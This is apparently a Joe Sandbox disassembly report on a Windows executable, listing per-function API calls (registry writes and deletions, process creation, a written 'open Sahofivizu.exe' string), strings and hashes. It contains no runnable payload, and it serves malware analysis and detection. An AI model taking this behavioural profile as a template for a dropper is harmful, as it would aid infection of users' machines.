Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E3E
Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E58
Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E66

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401F9C
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007

Strings

B, xrefs: 00401FC7

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: B
API String ID: 2987980305-3806887055
Opcode ID: 6d46612d3a10ff1fde0679903579df7a40cee65c269d183f8d6d4642c898af7f
Instruction ID: bf94c0598684f4a2e8798aed6ecd64900ad0f6fcd097f114c8a1beddd358b100
Opcode Fuzzy Hash: 6d46612d3a10ff1fde0679903579df7a40cee65c269d183f8d6d4642c898af7f
Instruction Fuzzy Hash: 5121EE72D04216EBCF107FA5CE49A6E75B06F45358F20433BF511B62E1C77C4941A65E

Uniqueness

Uniqueness Score: -1.00%

Function 00402303 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?), ref: 00402341
lstrlenA.KERNEL32(fd ,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
RegSetValueExA.ADVAPI32(?,?,?,?,fd ,00000000), ref: 0040239A
RegCloseKey.ADVAPI32(?), ref: 0040247D

Strings

fd , xrefs: 00402352, 00402360, 00402374, 00402384, 0040238F

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: fd
API String ID: 1356686001-2313478379
Opcode ID: 81d27fc1e3ab509f11f0648c0d675ea1f801cb77e08bc1b8ef6c2a36b769e97e
Instruction ID: 74c2b7e5efa1a9b7d251dd878628ee018497e02546d33d1ea7114f4406d6c15c
Opcode Fuzzy Hash: 81d27fc1e3ab509f11f0648c0d675ea1f801cb77e08bc1b8ef6c2a36b769e97e
Instruction Fuzzy Hash: 721160B1E00209BFEB10AFA5DE89EAF767CFB40398F10453AF901B71D0D6B85D019669

Uniqueness

Uniqueness Score: -1.00%

Function 00402A36 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
RegCloseKey.ADVAPI32(?), ref: 00402A9C
RegCloseKey.ADVAPI32(?), ref: 00402AC1
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: b26b43b9b7666f40e9fdb218fe96b22a79156d573bb7d5cc257a1d138f5a7564
Instruction ID: 324dab2b24170647655e9dcbeda369d8ff673eed47d89bab0de13a8960c84090
Opcode Fuzzy Hash: b26b43b9b7666f40e9fdb218fe96b22a79156d573bb7d5cc257a1d138f5a7564
Instruction Fuzzy Hash: 4F115675A00008FFEF31AF91DE49DAB7B6DEB40384B104436FA05B10A0DBB59E51AE69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CC1 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401CC5
GetClientRect.USER32 ref: 00401CD2
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CF3
SendMessageA.USER32 ref: 00401D01
DeleteObject.GDI32(00000000), ref: 00401D10

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 945e42f754af583b5ec13e30839ce2662c59fcb97218ebcfb2175b3756829da0
Instruction ID: f89edaf4e673e5a696cf4c500be88082f9c29b5fdabb6c66a10e118bddb835aa
Opcode Fuzzy Hash: 945e42f754af583b5ec13e30839ce2662c59fcb97218ebcfb2175b3756829da0
Instruction Fuzzy Hash: 71F01DB2E04105BFD700EBA4EE89DAFB7BDEB44345B104576F602F6190C678AD018B69

Uniqueness

Uniqueness Score: -1.00%

Function 00404597 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00429FE0,00429FE0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004044B7,000000DF,0000040F,00000400,00000000), ref: 00404625
wsprintfA.USER32 ref: 0040462D
SetDlgItemTextA.USER32(?,00429FE0), ref: 00404640

Strings

%u.%u%s%s, xrefs: 0040460F

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 308c210494ba65c8d6c58fead7846ea59173cd15c70e93c8128561061e7c40a4
Instruction ID: a73c68329ee831a229c644748369bffc84c82a565a353c3d841dc2820e0c3950
Opcode Fuzzy Hash: 308c210494ba65c8d6c58fead7846ea59173cd15c70e93c8128561061e7c40a4
Instruction Fuzzy Hash: 9911D0737001243BDB10A66D9C46EEF329ADBC6334F14023BFA25F61D1E9388C5286E8

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
SendMessageA.USER32 ref: 00401C25

Strings

!, xrefs: 00401BE1

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 5e77a80833e19dc55b8a20fadec5ab0659a97bc6c71de6bcb2193ca436d8299f
Instruction ID: e870f9960eb541ab862ab70d99fa676f0883abea00e9f1964bf1c40a5587cb5b
Opcode Fuzzy Hash: 5e77a80833e19dc55b8a20fadec5ab0659a97bc6c71de6bcb2193ca436d8299f
Instruction Fuzzy Hash: 3B21C4B1A44209BFEF01AFB4CE4AAAE7B75EF40344F14053EF602B60D1D6B84980E718

Uniqueness

Uniqueness Score: -1.00%

Function 0040526C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042BFE8,Error launching installer), ref: 00405291
CloseHandle.KERNEL32(?), ref: 0040529E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040526C
Error launching installer, xrefs: 0040527F

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
API String ID: 3712363035-3894416041
Opcode ID: dc33ac1254d82063a7b9e43172f0f507123e59eb9c5a5fd92b1179a08dc1bdb0
Instruction ID: 9c205d3d1494e9e4afb0e3639077779a104ecf70f113e6d393e41fe649cd8d97
Opcode Fuzzy Hash: dc33ac1254d82063a7b9e43172f0f507123e59eb9c5a5fd92b1179a08dc1bdb0
Instruction Fuzzy Hash: FBE0ECB4A04209ABEB00EF64ED09D7B7BBCEB00304B408522A911E2290D778E410CEB9

Uniqueness

Uniqueness Score: -1.00%

Function 004054FF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403244), ref: 00405505
CharPrevA.USER32(?,00000000), ref: 0040550E
lstrcatA.KERNEL32(?,00409010), ref: 0040551F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004054FF

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-4017390910
Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
Instruction ID: dfec000a3f5bf2671270dd29e8f8c50a5f72ee918dd093ba8f25731816a648b4
Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
Instruction Fuzzy Hash: FCD0A972705A307ED2022A19AC06F8F2A88CF17301B044822F100B62D2C23C9E418FFE

Uniqueness

Uniqueness Score: -1.00%

Function 00401EC5 Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24

Part of subcall function 0040596A: wsprintfA.USER32 ref: 00405977

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 099a0aa409c47306a0e5e8436e4e2e7c61bc24b53b401cebe12c2d8cce08dfb0
Instruction ID: ac83c8b0d38e5b491d5bd27050ffdb4091974a4b49ad9b19d675067d3fb65d11
Opcode Fuzzy Hash: 099a0aa409c47306a0e5e8436e4e2e7c61bc24b53b401cebe12c2d8cce08dfb0
Instruction Fuzzy Hash: 201148B2900108BFDB01EFA5D981DAEBBB9EF04344B24807AF505F61E1D7389A54DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00405593 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

CharNextA.USER32(ES@), ref: 004055A1
CharNextA.USER32(00000000), ref: 004055A6
CharNextA.USER32(00000000), ref: 004055B5

Strings

ES@, xrefs: 0040559C, 004055A0

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: CharNext
String ID: ES@
API String ID: 3213498283-1851447614
Opcode ID: 68c7f773aafbecf3834176a21eebbfbca0b4bda0270daf5a8c718fc322178301
Instruction ID: f60ec20427defc95a9886ae099bd540e39d30c8fbbaad3333d1940da6ed1a81e
Opcode Fuzzy Hash: 68c7f773aafbecf3834176a21eebbfbca0b4bda0270daf5a8c718fc322178301
Instruction Fuzzy Hash: F8F0A7A2D44B25B6E73222A84C44B6B6BADDB55711F244437E200B61D597B84C828FBA

Uniqueness

Uniqueness Score: -1.00%

Function 00401D1B Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D22
GetDeviceCaps.GDI32(00000000), ref: 00401D29
MulDiv.KERNEL32 ref: 00401D38
CreateFontIndirectA.GDI32(0040AF84), ref: 00401D8A

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: bbbcfc34ac2d637fe9c3dcd2aae23fbeb0c3268bdde6826654245cc777324362
Instruction ID: 580b179190550232f88f4ba5e52f5296c98f8c4b0afe68c870f47754878f2485
Opcode Fuzzy Hash: bbbcfc34ac2d637fe9c3dcd2aae23fbeb0c3268bdde6826654245cc777324362
Instruction Fuzzy Hash: 68F044F1A45342AEE702A7B0AE4B7993B649725309F100436F545BA1E2C5BC00149B7F

Uniqueness

Uniqueness Score: -1.00%

Function 00402BBE Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00402BD1
GetTickCount.KERNEL32(00000000,00402D9E,00000001), ref: 00402BEF
CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C0C
ShowWindow.USER32(00000000,00000005), ref: 00402C1A

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: c87a5157f8204693ca179b822d2a85440fc20d6be017f85e77c31dbe1d2c93c5
Instruction ID: df45f881ccb5ca36463c1a09230da8cf23750fca8468dec1cd15007da7f5e5e8
Opcode Fuzzy Hash: c87a5157f8204693ca179b822d2a85440fc20d6be017f85e77c31dbe1d2c93c5
Instruction Fuzzy Hash: 22F0F430A09120EBC6716F95FD4C99B7F64E704B157504437F001B55F5D67878829B9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040381E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

SetWindowTextA.USER32(00000000,0042E360), ref: 004038B6

Strings

1033, xrefs: 00403822, 0040382C, 0040389D
C:\Users\user\AppData\Local\Temp\, xrefs: 0040381F

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: TextWindow
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 530164218-1176120985
Opcode ID: 48b09981901e30c4345b6e5c0cee300cf490ae76efe8ca9e2f713c31fa19992d
Instruction ID: f58d08b88b77c55e92e539ad5181c9965f6bbcffbd0d008a8b371c472e4a47a6
Opcode Fuzzy Hash: 48b09981901e30c4345b6e5c0cee300cf490ae76efe8ca9e2f713c31fa19992d
Instruction Fuzzy Hash: 9311D176B001009BC734EF56DC809737BADEB8471636881BFEC02A7390D639A8038A98

Uniqueness

Uniqueness Score: -1.00%

Function 00404CFA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404D30
CallWindowProcA.USER32(?,00000200,?,?), ref: 00404D9E

Part of subcall function 00403E0A: SendMessageA.USER32 ref: 00403E1C

Strings

, xrefs: 00404D08

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 498d22ec92de87507460055f31d3341dd140a7d0c04a54d74523ea2b6bf50dd0
Instruction ID: b16bf2df46199d4e0f4b20eb531931f7d117dfa55111be6f57691eac5a9fa7e0
Opcode Fuzzy Hash: 498d22ec92de87507460055f31d3341dd140a7d0c04a54d74523ea2b6bf50dd0
Instruction Fuzzy Hash: 25114F71600218BBDB219F52DC41AAB3B69AF84365F00813FFA04B91E1C37D8D51CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004024BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 004024DC
WriteFile.KERNEL32(00000000,?,open Sahofivizu.exe,00000000,?), ref: 004024FB

Strings

open Sahofivizu.exe, xrefs: 004024CA, 004024EF

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: FileWritelstrlen
String ID: open Sahofivizu.exe
API String ID: 427699356-1596923502
Opcode ID: 01a20a6393f6cf1e01e81d8ef9af866549bd590d312b5bd55c7394e971cc1238
